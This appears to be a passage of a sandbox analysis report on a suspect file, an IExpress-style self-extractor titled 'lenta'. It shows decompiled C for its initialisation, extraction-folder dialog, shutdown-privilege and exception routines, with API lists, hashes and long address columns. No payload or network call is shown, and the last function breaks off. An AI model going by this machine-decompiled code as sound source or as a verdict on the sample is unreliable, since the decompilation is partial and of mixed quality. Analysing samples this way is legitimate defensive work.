                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 001060AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00101140,00000000,00000040,00000000), ref: 001061F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 001061F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: 38868b7b35e1e37737f7a0e9b3f7ffc7763beb0701eddb0d0489a24c7145be8d
                                                                                                                                                                                                                                                • Instruction ID: 3e6b4cc6357db81348841d183bf5e9fc2647a2f9be1790a64ba83caf95d16ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38868b7b35e1e37737f7a0e9b3f7ffc7763beb0701eddb0d0489a24c7145be8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78D14B71A08A559EEF358B388C487BB7B67AB16300F1441AAD4CAD75D1DBF48EC68F40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00101F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E00101F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x109a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x108004; // 0xb5a2e1bc
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E001044B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00106CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E001044B9(0, 0x522, 0x101140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00101EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                                0x00101f90
                                                                                                                                                                                                                                                0x00101f90
                                                                                                                                                                                                                                                0x00101f93
                                                                                                                                                                                                                                                0x00101f98
                                                                                                                                                                                                                                                0x00101fa4
                                                                                                                                                                                                                                                0x00101fa7
                                                                                                                                                                                                                                                0x00101fc5
                                                                                                                                                                                                                                                0x00101fcd
                                                                                                                                                                                                                                                0x00101fdb
                                                                                                                                                                                                                                                0x00101ee5
                                                                                                                                                                                                                                                0x00101eea
                                                                                                                                                                                                                                                0x00101ef1
                                                                                                                                                                                                                                                0x00101ef4
                                                                                                                                                                                                                                                0x00101f0c
                                                                                                                                                                                                                                                0x00101f2e
                                                                                                                                                                                                                                                0x00101f3a
                                                                                                                                                                                                                                                0x00101f46
                                                                                                                                                                                                                                                0x00101f4d
                                                                                                                                                                                                                                                0x00101f58
                                                                                                                                                                                                                                                0x00101f60
                                                                                                                                                                                                                                                0x00101f61
                                                                                                                                                                                                                                                0x00101f62
                                                                                                                                                                                                                                                0x00101f75
                                                                                                                                                                                                                                                0x00101f80
                                                                                                                                                                                                                                                0x00101f77
                                                                                                                                                                                                                                                0x00101f77
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101f77
                                                                                                                                                                                                                                                0x00101f64
                                                                                                                                                                                                                                                0x00101f64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101f64
                                                                                                                                                                                                                                                0x00101f0e
                                                                                                                                                                                                                                                0x00101f0e
                                                                                                                                                                                                                                                0x00101f13
                                                                                                                                                                                                                                                0x00101f13
                                                                                                                                                                                                                                                0x00101f14
                                                                                                                                                                                                                                                0x00101f14
                                                                                                                                                                                                                                                0x00101f16
                                                                                                                                                                                                                                                0x00101f17
                                                                                                                                                                                                                                                0x00101f1a
                                                                                                                                                                                                                                                0x00101f1f
                                                                                                                                                                                                                                                0x00101f1f
                                                                                                                                                                                                                                                0x00101f86
                                                                                                                                                                                                                                                0x00101f8f
                                                                                                                                                                                                                                                0x00101fcf
                                                                                                                                                                                                                                                0x00101fd3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101fd3
                                                                                                                                                                                                                                                0x00101fa9
                                                                                                                                                                                                                                                0x00101fb4
                                                                                                                                                                                                                                                0x00101fbb
                                                                                                                                                                                                                                                0x00101fc3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101fc3
                                                                                                                                                                                                                                                0x00101f9a
                                                                                                                                                                                                                                                0x00101f9a
                                                                                                                                                                                                                                                0x00101fa2
                                                                                                                                                                                                                                                0x00101fd9
                                                                                                                                                                                                                                                0x00101fda
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101fa2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00101EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00101F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00101FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: 08d0c9327e047c43d3298b827bb3a92fe0b76983fc032c210a3bdf562a896f63
                                                                                                                                                                                                                                                • Instruction ID: 6fff0432f1819682de2645053d1b5c372523006d98099c1b712959a31d70787b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08d0c9327e047c43d3298b827bb3a92fe0b76983fc032c210a3bdf562a896f63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC21B5B1B403067BDB206BA19C4AFBF76B8EB85B10F500019FB82E65C5D7F888459661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00106CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00106CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                                0x00106cf7
                                                                                                                                                                                                                                                0x00106d00
                                                                                                                                                                                                                                                0x00106d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00106E26,00101000), ref: 00106CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00106E26,?,00106E26,00101000), ref: 00106D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00106E26,00101000), ref: 00106D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00106E26,00101000), ref: 00106D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: de775f83bae0d369da9eb213900555b483b5d2427bbf241fdd38c7b95b62bf74
                                                                                                                                                                                                                                                • Instruction ID: f97ec31f532184a6c03cff6de72c5619622380a09dbac4199bcfc7fb983dc01c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de775f83bae0d369da9eb213900555b483b5d2427bbf241fdd38c7b95b62bf74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4ED0C932000308BBDB002BE1EC0CA593F28FF48212F844000F35982820CAB244918B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00103210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E00103210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E001043D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x109a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1091e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E001044B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x1091e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x1091e5 - 3;
						if(_t49 - 0x1091e5 < 3) {
							goto L32;
						}
						_t24 =  *0x1091e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x1091e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0010658A(0x1091e4, 0x104, 0x101140);
								_t27 = E001058C8(0x1091e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x1091e4 - 0x5c;
									if( *0x1091e4 != 0x5c) {
										L30:
										_t30 = E0010597D(0x1091e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x1091e5 - 0x5c;
									if( *0x1091e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E001044B9(_t64, 0x54a, 0x1091e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x1091e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x1091e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x1091e4 - 0x5c;
						if( *0x1091e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x109124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x109a3c, 0x3e8, 0x108598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00104224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1087a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E001044B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                                0x0010321b
                                                                                                                                                                                                                                                0x0010321e
                                                                                                                                                                                                                                                0x00103221
                                                                                                                                                                                                                                                0x0010343c
                                                                                                                                                                                                                                                0x0010343e
                                                                                                                                                                                                                                                0x0010343f
                                                                                                                                                                                                                                                0x00103445
                                                                                                                                                                                                                                                0x00103447
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103447
                                                                                                                                                                                                                                                0x00103229
                                                                                                                                                                                                                                                0x0010322a
                                                                                                                                                                                                                                                0x0010322f
                                                                                                                                                                                                                                                0x001033ec
                                                                                                                                                                                                                                                0x001033f7
                                                                                                                                                                                                                                                0x00103410
                                                                                                                                                                                                                                                0x00103416
                                                                                                                                                                                                                                                0x0010341d
                                                                                                                                                                                                                                                0x0010342d
                                                                                                                                                                                                                                                0x0010342d
                                                                                                                                                                                                                                                0x00103438
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103438
                                                                                                                                                                                                                                                0x00103237
                                                                                                                                                                                                                                                0x00103243
                                                                                                                                                                                                                                                0x00103243
                                                                                                                                                                                                                                                0x00103246
                                                                                                                                                                                                                                                0x001032ee
                                                                                                                                                                                                                                                0x001032f4
                                                                                                                                                                                                                                                0x001032f6
                                                                                                                                                                                                                                                0x001033d4
                                                                                                                                                                                                                                                0x001033d6
                                                                                                                                                                                                                                                0x001033db
                                                                                                                                                                                                                                                0x001033dc
                                                                                                                                                                                                                                                0x001033de
                                                                                                                                                                                                                                                0x001033df
                                                                                                                                                                                                                                                0x00103370
                                                                                                                                                                                                                                                0x00103372
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103372
                                                                                                                                                                                                                                                0x001032fc
                                                                                                                                                                                                                                                0x00103301
                                                                                                                                                                                                                                                0x00103301
                                                                                                                                                                                                                                                0x00103303
                                                                                                                                                                                                                                                0x00103304
                                                                                                                                                                                                                                                0x00103304
                                                                                                                                                                                                                                                0x0010330a
                                                                                                                                                                                                                                                0x0010330d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103313
                                                                                                                                                                                                                                                0x00103318
                                                                                                                                                                                                                                                0x0010331a
                                                                                                                                                                                                                                                0x00103331
                                                                                                                                                                                                                                                0x00103332
                                                                                                                                                                                                                                                0x0010333a
                                                                                                                                                                                                                                                0x0010333d
                                                                                                                                                                                                                                                0x0010337c
                                                                                                                                                                                                                                                0x00103388
                                                                                                                                                                                                                                                0x0010338f
                                                                                                                                                                                                                                                0x00103394
                                                                                                                                                                                                                                                0x00103396
                                                                                                                                                                                                                                                0x001033a4
                                                                                                                                                                                                                                                0x001033ab
                                                                                                                                                                                                                                                0x001033b6
                                                                                                                                                                                                                                                0x001033be
                                                                                                                                                                                                                                                0x001033c3
                                                                                                                                                                                                                                                0x001033c5
                                                                                                                                                                                                                                                0x00103435
                                                                                                                                                                                                                                                0x00103437
                                                                                                                                                                                                                                                0x00103437
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103437
                                                                                                                                                                                                                                                0x001033c7
                                                                                                                                                                                                                                                0x001033c9
                                                                                                                                                                                                                                                0x001033cc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001033cc
                                                                                                                                                                                                                                                0x001033ad
                                                                                                                                                                                                                                                0x001033b4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001033b4
                                                                                                                                                                                                                                                0x00103398
                                                                                                                                                                                                                                                0x00103399
                                                                                                                                                                                                                                                0x0010339b
                                                                                                                                                                                                                                                0x0010339c
                                                                                                                                                                                                                                                0x0010339d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010339d
                                                                                                                                                                                                                                                0x0010334c
                                                                                                                                                                                                                                                0x00103351
                                                                                                                                                                                                                                                0x00103354
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010335c
                                                                                                                                                                                                                                                0x00103362
                                                                                                                                                                                                                                                0x00103364
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103366
                                                                                                                                                                                                                                                0x00103367
                                                                                                                                                                                                                                                0x00103369
                                                                                                                                                                                                                                                0x0010336a
                                                                                                                                                                                                                                                0x0010336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010336b
                                                                                                                                                                                                                                                0x0010331c
                                                                                                                                                                                                                                                0x00103323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103329
                                                                                                                                                                                                                                                0x0010332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010332b
                                                                                                                                                                                                                                                0x0010324c
                                                                                                                                                                                                                                                0x0010324c
                                                                                                                                                                                                                                                0x0010324f
                                                                                                                                                                                                                                                0x001032c8
                                                                                                                                                                                                                                                0x001032ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001032ce
                                                                                                                                                                                                                                                0x00103251
                                                                                                                                                                                                                                                0x00103256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103271
                                                                                                                                                                                                                                                0x00103277
                                                                                                                                                                                                                                                0x00103279
                                                                                                                                                                                                                                                0x00103298
                                                                                                                                                                                                                                                0x0010329d
                                                                                                                                                                                                                                                0x0010329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001032b0
                                                                                                                                                                                                                                                0x001032b6
                                                                                                                                                                                                                                                0x001032b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001032be
                                                                                                                                                                                                                                                0x00103280
                                                                                                                                                                                                                                                0x00103289
                                                                                                                                                                                                                                                0x0010328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010328e
                                                                                                                                                                                                                                                0x0010327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,00108598,00000200), ref: 00103271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 001033E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 001033F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00103410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 00103426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 0010342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0010343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-4094094698
                                                                                                                                                                                                                                                • Opcode ID: e81a829e88218eba867f19c2629d24892003be430ad68bb93755f52a47fea740
                                                                                                                                                                                                                                                • Instruction ID: 141cd7fbce96ac4543616b118d444741b7a34a8d1aa1e75a5dd3a8a48a7aeb43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81a829e88218eba867f19c2629d24892003be430ad68bb93755f52a47fea740
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A513670380340BBEB256B355C9CF7B2A5DAF96B54F508028F2E5EA5D1CFF48A4192A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00102CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x109a3c = __ecx;
				memset(0x109140, 0, 0x8fc);
				memset(0x108a20, 0, 0x32c);
				memset(0x1088c0, 0, 0x104);
				 *0x1093ec = 1;
				_t20 = E0010468F("TITLE", 0x109154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x10858c = _t27;
					SetEvent(_t27);
					_t64 = 0x109a34;
					if(E0010468F("EXTRACTOPT", 0x109a34, 4) != 0) {
						if(( *0x109a34 & 0x000000c0) == 0) {
							L12:
							 *0x109120 =  *0x109120 & _t65;
							if(E00105C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x108a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x108184 != 0) {
										__imp__#17();
									}
									if( *0x108a24 == 0) {
										_t57 = _t65;
										if(E001036EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x109a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x109a34 & 0x00000100) == 0 || ( *0x108a38 & 0x00000001) != 0 || E001018A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00106517(_t57, 0x7d6, _t34, E001019E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00102390(0x108a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E001044B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0010468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x108588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x109a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E001044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E001044B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x108588);
										 *0x109124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x109124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00106CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                                0x00102cb5
                                                                                                                                                                                                                                                0x00102cbc
                                                                                                                                                                                                                                                0x00102cc7
                                                                                                                                                                                                                                                0x00102cc9
                                                                                                                                                                                                                                                0x00102cd1
                                                                                                                                                                                                                                                0x00102cd3
                                                                                                                                                                                                                                                0x00102cd9
                                                                                                                                                                                                                                                0x00102ce9
                                                                                                                                                                                                                                                0x00102cf9
                                                                                                                                                                                                                                                0x00102d0e
                                                                                                                                                                                                                                                0x00102d15
                                                                                                                                                                                                                                                0x00102d1c
                                                                                                                                                                                                                                                0x00102ef3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102d2d
